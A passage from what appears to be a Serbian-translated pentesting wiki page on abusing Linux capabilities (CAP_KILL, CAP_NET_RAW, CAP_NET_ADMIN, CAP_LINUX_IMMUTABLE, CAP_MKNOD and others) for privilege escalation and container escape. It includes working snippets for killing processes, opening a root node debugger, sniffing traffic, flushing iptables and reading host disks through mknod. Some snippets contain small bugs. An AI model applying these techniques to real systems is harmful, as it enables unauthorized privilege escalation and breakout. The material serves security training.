0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
|
||
```
|
||
Ova sposobnost omogućava da **damo bilo koju drugu sposobnost binarnim datotekama**, tako da možemo razmišljati o **izbegavanju** iz kontejnera **zloupotrebom bilo koje od drugih sposobnosti** pomenutih na ovoj stranici.\
|
||
Međutim, ako pokušate da dodelite, na primer, sposobnosti CAP_SYS_ADMIN i CAP_SYS_PTRACE binarnoj datoteci gdb, otkrićete da ih možete dodeliti, ali **binarna datoteka neće moći da se izvrši nakon toga**:
|
||
```bash
|
||
getcap /usr/bin/gdb
|
||
/usr/bin/gdb = cap_sys_ptrace,cap_sys_admin+eip
|
||
|
||
setcap cap_sys_admin,cap_sys_ptrace+eip /usr/bin/gdb
|
||
|
||
/usr/bin/gdb
|
||
bash: /usr/bin/gdb: Operation not permitted
|
||
```
|
||
[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Dozvoljeno: Ovo je **ograničeni superset za efektivne sposobnosti** koje nit može preuzeti. Takođe je ograničeni superset za sposobnosti koje mogu biti dodate u nasledni skup od strane niti koja **nema CAP_SETPCAP** sposobnost u svom efektivnom skupu._\
|
||
Izgleda da dozvoljene sposobnosti ograničavaju one koje se mogu koristiti.\
|
||
Međutim, Docker takođe po defaultu dodeljuje **CAP_SETPCAP**, tako da možda možete **postaviti nove sposobnosti unutar naslednih**.\
|
||
Međutim, u dokumentaciji ove sposobnosti: _CAP_SETPCAP : \[…] **dodaje bilo koju sposobnost iz ograničenog** skupa pozivajuće niti u njen nasledni skup_.\
|
||
Izgleda da možemo dodavati samo u nasledni skup sposobnosti iz ograničenog skupa. Što znači da **ne možemo staviti nove sposobnosti kao što su CAP_SYS_ADMIN ili CAP_SYS_PTRACE u nasledni skup za eskalaciju privilegija**.
|
||
|
||
## CAP_SYS_RAWIO
|
||
|
||
[**CAP_SYS_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) pruža niz osetljivih operacija uključujući pristup `/dev/mem`, `/dev/kmem` ili `/proc/kcore`, modifikaciju `mmap_min_addr`, pristup `ioperm(2)` i `iopl(2)` sistemskim pozivima, i razne disk komande. `FIBMAP ioctl(2)` je takođe omogućen putem ove sposobnosti, što je uzrokovalo probleme u [prošlosti](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). Prema stranici sa uputstvima, ovo takođe omogućava nosiocu da opisno `izvrši niz operacija specifičnih za uređaje na drugim uređajima`.
|
||
|
||
Ovo može biti korisno za **escalaciju privilegija** i **Docker breakout.**
|
||
|
||
## CAP_KILL
|
||
|
||
**To znači da je moguće ubiti bilo koji proces.**
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
Pretpostavimo da **`python`** binarni fajl ima ovu sposobnost. Ako biste mogli **takođe modifikovati neku konfiguraciju servisa ili soketa** (ili bilo koji konfiguracioni fajl vezan za servis), mogli biste ga unazaditi, a zatim ubiti proces vezan za taj servis i čekati da se novi konfiguracioni fajl izvrši sa vašim unazadjenjem.
|
||
```python
|
||
#Use this python code to kill arbitrary processes
|
||
import os
|
||
import signal
|
||
pgid = os.getpgid(341)
|
||
os.killpg(pgid, signal.SIGKILL)
|
||
```
|
||
**Privesc sa kill**
|
||
|
||
Ako imate kill mogućnosti i postoji **node program koji se izvršava kao root** (ili kao drugi korisnik) mogli biste verovatno **poslati** mu **signal SIGUSR1** i naterati ga da **otvori node debager** na koji se možete povezati.
|
||
```bash
|
||
kill -s SIGUSR1 <nodejs-ps>
|
||
# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
|
||
```
|
||
{{#ref}}
|
||
electron-cef-chromium-debugger-abuse.md
|
||
{{#endref}}
|
||
|
||
|
||
## CAP_NET_BIND_SERVICE
|
||
|
||
**To znači da je moguće slušati na bilo kojem portu (čak i na privilegovanim).** Ne možete direktno eskalirati privilegije sa ovom sposobnošću.
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
Ako **`python`** ima ovu sposobnost, moći će da sluša na bilo kojem portu i čak se poveže sa bilo kojim drugim portom (neke usluge zahtevaju veze sa specifičnih privilegovanih portova)
|
||
|
||
{{#tabs}}
|
||
{{#tab name="Listen"}}
|
||
```python
|
||
import socket
|
||
s=socket.socket()
|
||
s.bind(('0.0.0.0', 80))
|
||
s.listen(1)
|
||
conn, addr = s.accept()
|
||
while True:
|
||
output = connection.recv(1024).strip();
|
||
print(output)
|
||
```
|
||
{{#endtab}}
|
||
|
||
{{#tab name="Connect"}}
|
||
```python
|
||
import socket
|
||
s=socket.socket()
|
||
s.bind(('0.0.0.0',500))
|
||
s.connect(('10.10.10.10',500))
|
||
```
|
||
{{#endtab}}
|
||
{{#endtabs}}
|
||
|
||
## CAP_NET_RAW
|
||
|
||
[**CAP_NET_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) sposobnost omogućava procesima da **kreiraju RAW i PACKET sokete**, omogućavajući im da generišu i šalju proizvolne mrežne pakete. To može dovesti do bezbednosnih rizika u kontejnerizovanim okruženjima, kao što su spoofing paketa, injekcija saobraćaja i zaobilaženje mrežnih kontrola pristupa. Zlonamerni akteri bi mogli iskoristiti ovo da ometaju rutiranje kontejnera ili ugroze bezbednost mreže domaćina, posebno bez adekvatne zaštite od vatrozida. Pored toga, **CAP_NET_RAW** je ključan za privilegovane kontejnere da podrže operacije poput pinga putem RAW ICMP zahteva.
|
||
|
||
**To znači da je moguće prisluškivati saobraćaj.** Ne možete direktno eskalirati privilegije sa ovom sposobnošću.
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
Ako binarni fajl **`tcpdump`** ima ovu sposobnost, moći ćete da ga koristite za hvatanje mrežnih informacija.
|
||
```bash
|
||
getcap -r / 2>/dev/null
|
||
/usr/sbin/tcpdump = cap_net_raw+ep
|
||
```
|
||
Napomena da ako **okruženje** daje ovu sposobnost, možete takođe koristiti **`tcpdump`** za presretanje saobraćaja.
|
||
|
||
**Primer sa binarnim 2**
|
||
|
||
Sledeći primer je **`python2`** kod koji može biti koristan za presretanje saobraćaja sa "**lo**" (**localhost**) interfejsa. Kod je iz laboratorije "_Osnove: CAP-NET_BIND + NET_RAW_" sa [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com)
|
||
```python
|
||
import socket
|
||
import struct
|
||
|
||
flags=["NS","CWR","ECE","URG","ACK","PSH","RST","SYN","FIN"]
|
||
|
||
def getFlag(flag_value):
|
||
flag=""
|
||
for i in xrange(8,-1,-1):
|
||
if( flag_value & 1 <<i ):
|
||
flag= flag + flags[8-i] + ","
|
||
return flag[:-1]
|
||
|
||
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(3))
|
||
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 2**30)
|
||
s.bind(("lo",0x0003))
|
||
|
||
flag=""
|
||
count=0
|
||
while True:
|
||
frame=s.recv(4096)
|
||
ip_header=struct.unpack("!BBHHHBBH4s4s",frame[14:34])
|
||
proto=ip_header[6]
|
||
ip_header_size = (ip_header[0] & 0b1111) * 4
|
||
if(proto==6):
|
||
protocol="TCP"
|
||
tcp_header_packed = frame[ 14 + ip_header_size : 34 + ip_header_size]
|
||
tcp_header = struct.unpack("!HHLLHHHH", tcp_header_packed)
|
||
dst_port=tcp_header[0]
|
||
src_port=tcp_header[1]
|
||
flag=" FLAGS: "+getFlag(tcp_header[4])
|
||
|
||
elif(proto==17):
|
||
protocol="UDP"
|
||
udp_header_packed_ports = frame[ 14 + ip_header_size : 18 + ip_header_size]
|
||
udp_header_ports=struct.unpack("!HH",udp_header_packed_ports)
|
||
dst_port=udp_header[0]
|
||
src_port=udp_header[1]
|
||
|
||
if (proto == 17 or proto == 6):
|
||
print("Packet: " + str(count) + " Protocol: " + protocol + " Destination Port: " + str(dst_port) + " Source Port: " + str(src_port) + flag)
|
||
count=count+1
|
||
```
|
||
## CAP_NET_ADMIN + CAP_NET_RAW
|
||
|
||
[**CAP_NET_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) sposobnost daje nosiocu moć da **menja mrežne konfiguracije**, uključujući podešavanja vatrozida, tabele rutiranja, dozvole za sokete i podešavanja mrežnih interfejsa unutar izloženih mrežnih imenskih prostora. Takođe omogućava uključivanje **promiskuitetnog moda** na mrežnim interfejsima, što omogućava presretanje paketa širom imenskih prostora.
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
Pretpostavimo da **python binarni fajl** ima ove sposobnosti.
|
||
```python
|
||
#Dump iptables filter table rules
|
||
import iptc
|
||
import pprint
|
||
json=iptc.easy.dump_table('filter',ipv6=False)
|
||
pprint.pprint(json)
|
||
|
||
#Flush iptables filter table
|
||
import iptc
|
||
iptc.easy.flush_table('filter')
|
||
```
|
||
## CAP_LINUX_IMMUTABLE
|
||
|
||
**To znači da je moguće modifikovati inode atribute.** Ne možete direktno eskalirati privilegije sa ovom sposobnošću.
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
Ako otkrijete da je fajl nepromenljiv i da python ima ovu sposobnost, možete **ukloniti nepromenljivi atribut i omogućiti modifikaciju fajla:**
|
||
```python
|
||
#Check that the file is imutable
|
||
lsattr file.sh
|
||
----i---------e--- backup.sh
|
||
```
|
||
|
||
```python
|
||
#Pyhton code to allow modifications to the file
|
||
import fcntl
|
||
import os
|
||
import struct
|
||
|
||
FS_APPEND_FL = 0x00000020
|
||
FS_IOC_SETFLAGS = 0x40086602
|
||
|
||
fd = os.open('/path/to/file.sh', os.O_RDONLY)
|
||
f = struct.pack('i', FS_APPEND_FL)
|
||
fcntl.ioctl(fd, FS_IOC_SETFLAGS, f)
|
||
|
||
f=open("/path/to/file.sh",'a+')
|
||
f.write('New content for the file\n')
|
||
```
|
||
> [!NOTE]
|
||
> Imajte na umu da se obično ova nepromenljiva atribut postavlja i uklanja koristeći:
|
||
>
|
||
> ```bash
|
||
> sudo chattr +i file.txt
|
||
> sudo chattr -i file.txt
|
||
> ```
|
||
|
||
## CAP_SYS_CHROOT
|
||
|
||
[**CAP_SYS_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) omogućava izvršavanje `chroot(2)` sistemskog poziva, što može potencijalno omogućiti bekstvo iz `chroot(2)` okruženja kroz poznate ranjivosti:
|
||
|
||
- [Kako pobegnuti iz raznih chroot rešenja](https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions_-_Bucsay_Balazs.pdf)
|
||
- [chw00t: alat za bekstvo iz chroot-a](https://github.com/earthquake/chw00t/)
|
||
|
||
## CAP_SYS_BOOT
|
||
|
||
[**CAP_SYS_BOOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) ne samo da omogućava izvršavanje `reboot(2)` sistemskog poziva za restartovanje sistema, uključujući specifične komande kao što su `LINUX_REBOOT_CMD_RESTART2` prilagođene za određene hardverske platforme, već takođe omogućava korišćenje `kexec_load(2)` i, od Linux 3.17 pa nadalje, `kexec_file_load(2)` za učitavanje novih ili potpisanih crash kernela.
|
||
|
||
## CAP_SYSLOG
|
||
|
||
[**CAP_SYSLOG**](https://man7.org/linux/man-pages/man7/capabilities.7.html) je odvojen od šireg **CAP_SYS_ADMIN** u Linux 2.6.37, specifično dodeljujući mogućnost korišćenja `syslog(2)` poziva. Ova sposobnost omogućava pregledanje kernel adresa putem `/proc` i sličnih interfejsa kada je `kptr_restrict` postavljen na 1, što kontroliše izlaganje kernel adresa. Od Linux 2.6.39, podrazumevana vrednost za `kptr_restrict` je 0, što znači da su kernel adrese izložene, iako mnoge distribucije postavljaju ovo na 1 (sakrij adrese osim za uid 0) ili 2 (uvek sakrij adrese) iz bezbednosnih razloga.
|
||
|
||
Pored toga, **CAP_SYSLOG** omogućava pristup `dmesg` izlazu kada je `dmesg_restrict` postavljen na 1. I pored ovih promena, **CAP_SYS_ADMIN** zadržava mogućnost izvođenja `syslog` operacija zbog istorijskih presedana.
|
||
|
||
## CAP_MKNOD
|
||
|
||
[**CAP_MKNOD**](https://man7.org/linux/man-pages/man7/capabilities.7.html) proširuje funkcionalnost `mknod` sistemskog poziva izvan kreiranja običnih fajlova, FIFOs (imenovanih cevi) ili UNIX domen soketa. Specifično omogućava kreiranje specijalnih fajlova, koji uključuju:
|
||
|
||
- **S_IFCHR**: Specijalni fajlovi karaktera, koji su uređaji poput terminala.
|
||
- **S_IFBLK**: Specijalni blok fajlovi, koji su uređaji poput diskova.
|
||
|
||
Ova sposobnost je ključna za procese koji zahtevaju mogućnost kreiranja fajlova uređaja, olakšavajući direktnu interakciju sa hardverom putem karakterističnih ili blok uređaja.
|
||
|
||
To je podrazumevana docker sposobnost ([https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19](https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19)).
|
||
|
||
Ova sposobnost omogućava eskalaciju privilegija (kroz potpuno čitanje diska) na hostu, pod sledećim uslovima:
|
||
|
||
1. Imati inicijalni pristup hostu (Nepovlašćen).
|
||
2. Imati inicijalni pristup kontejneru (Povlašćen (EUID 0), i efektivni `CAP_MKNOD`).
|
||
3. Host i kontejner treba da dele isti korisnički prostor.
|
||
|
||
**Koraci za kreiranje i pristup blok uređaju u kontejneru:**
|
||
|
||
1. **Na hostu kao standardni korisnik:**
|
||
|
||
- Odredite svoj trenutni korisnički ID sa `id`, npr., `uid=1000(standarduser)`.
|
||
- Identifikujte ciljni uređaj, na primer, `/dev/sdb`.
|
||
|
||
2. **Unutar kontejnera kao `root`:**
|
||
```bash
|
||
# Create a block special file for the host device
|
||
mknod /dev/sdb b 8 16
|
||
# Set read and write permissions for the user and group
|
||
chmod 660 /dev/sdb
|
||
# Add the corresponding standard user present on the host
|
||
useradd -u 1000 standarduser
|
||
# Switch to the newly created user
|
||
su standarduser
|
||
```
|
||
3. **Ponovo na hostu:**
|
||
```bash
|
||
# Locate the PID of the container process owned by "standarduser"
|
||
# This is an illustrative example; actual command might vary
|
||
ps aux | grep -i container_name | grep -i standarduser
|
||
# Assuming the found PID is 12345
|
||
# Access the container's filesystem and the special block device
|
||
head /proc/12345/root/dev/sdb
|
||
```
|
||
Ovaj pristup omogućava standardnom korisniku da pristupi i potencijalno pročita podatke sa `/dev/sdb` kroz kontejner, koristeći deljene korisničke imenske prostore i dozvole postavljene na uređaju.
|
||
|
||
### CAP_SETPCAP
|
||
|
||
**CAP_SETPCAP** omogućava procesu da **menja skupove sposobnosti** drugog procesa, omogućavajući dodavanje ili uklanjanje sposobnosti iz efektivnog, naslednog i dozvoljenog skupa. Međutim, proces može da menja samo sposobnosti koje poseduje u svom dozvoljenom skupu, osiguravajući da ne može da poveća privilegije drugog procesa iznad svojih. Nedavne ažuriranja jezgra su pooštrila ova pravila, ograničavajući `CAP_SETPCAP` samo na smanjenje sposobnosti unutar svog ili dozvoljenog skupa svojih potomaka, sa ciljem smanjenja bezbednosnih rizika. Korišćenje zahteva da imate `CAP_SETPCAP` u efektivnom skupu i ciljne sposobnosti u dozvoljenom skupu, koristeći `capset()` za izmene. Ovo sumira osnovnu funkciju i ograničenja `CAP_SETPCAP`, ističući njegovu ulogu u upravljanju privilegijama i poboljšanju bezbednosti.
|
||
|
||
**`CAP_SETPCAP`** je Linux sposobnost koja omogućava procesu da **menja skupove sposobnosti drugog procesa**. Daje mogućnost dodavanja ili uklanjanja sposobnosti iz efektivnog, naslednog i dozvoljenog skupa sposobnosti drugih procesa. Međutim, postoje određena ograničenja u načinu na koji se ova sposobnost može koristiti.
|
||
|
||
Proces sa `CAP_SETPCAP` **može samo dodeliti ili ukloniti sposobnosti koje su u njegovom vlastitom dozvoljenom skupu sposobnosti**. Drugim rečima, proces ne može dodeliti sposobnost drugom procesu ako je sam ne poseduje. Ovo ograničenje sprečava proces da poveća privilegije drugog procesa iznad svog nivoa privilegije.
|
||
|
||
Štaviše, u nedavnim verzijama jezgra, sposobnost `CAP_SETPCAP` je **dodatno ograničena**. Više ne omogućava procesu da proizvoljno menja skupove sposobnosti drugih procesa. Umesto toga, **samo omogućava procesu da smanji sposobnosti u svom dozvoljenom skupu sposobnosti ili dozvoljenom skupu sposobnosti svojih potomaka**. Ova promena je uvedena kako bi se smanjili potencijalni bezbednosni rizici povezani sa sposobnošću.
|
||
|
||
Da biste efikasno koristili `CAP_SETPCAP`, potrebno je da imate sposobnost u svom efektivnom skupu sposobnosti i ciljne sposobnosti u svom dozvoljenom skupu sposobnosti. Tada možete koristiti sistemski poziv `capset()` za izmene skupova sposobnosti drugih procesa.
|
||
|
||
Ukratko, `CAP_SETPCAP` omogućava procesu da menja skupove sposobnosti drugih procesa, ali ne može dodeliti sposobnosti koje sam ne poseduje. Pored toga, zbog bezbednosnih briga, njegova funkcionalnost je ograničena u nedavnim verzijama jezgra da bi se omogućilo samo smanjenje sposobnosti u svom dozvoljenom skupu sposobnosti ili dozvoljenim skupovima sposobnosti svojih potomaka.
|
||
|
||
## References
|
||
|
||
**Većina ovih primera je uzeta iz nekih laboratorija** [**https://attackdefense.pentesteracademy.com/**](https://attackdefense.pentesteracademy.com), pa ako želite da vežbate ove privesc tehnike, preporučujem ove laboratorije.
|
||
|
||
**Ostale reference**:
|
||
|
||
- [https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux](https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux)
|
||
- [https://www.schutzwerk.com/en/43/posts/linux_container_capabilities/#:\~:text=Inherited%20capabilities%3A%20A%20process%20can,a%20binary%2C%20e.g.%20using%20setcap%20.](https://www.schutzwerk.com/en/43/posts/linux_container_capabilities/)
|
||
- [https://linux-audit.com/linux-capabilities-101/](https://linux-audit.com/linux-capabilities-101/)
|
||
- [https://www.linuxjournal.com/article/5737](https://www.linuxjournal.com/article/5737)
|
||
- [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap_sys_module](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap_sys_module)
|
||
- [https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot](https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot)
|
||
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|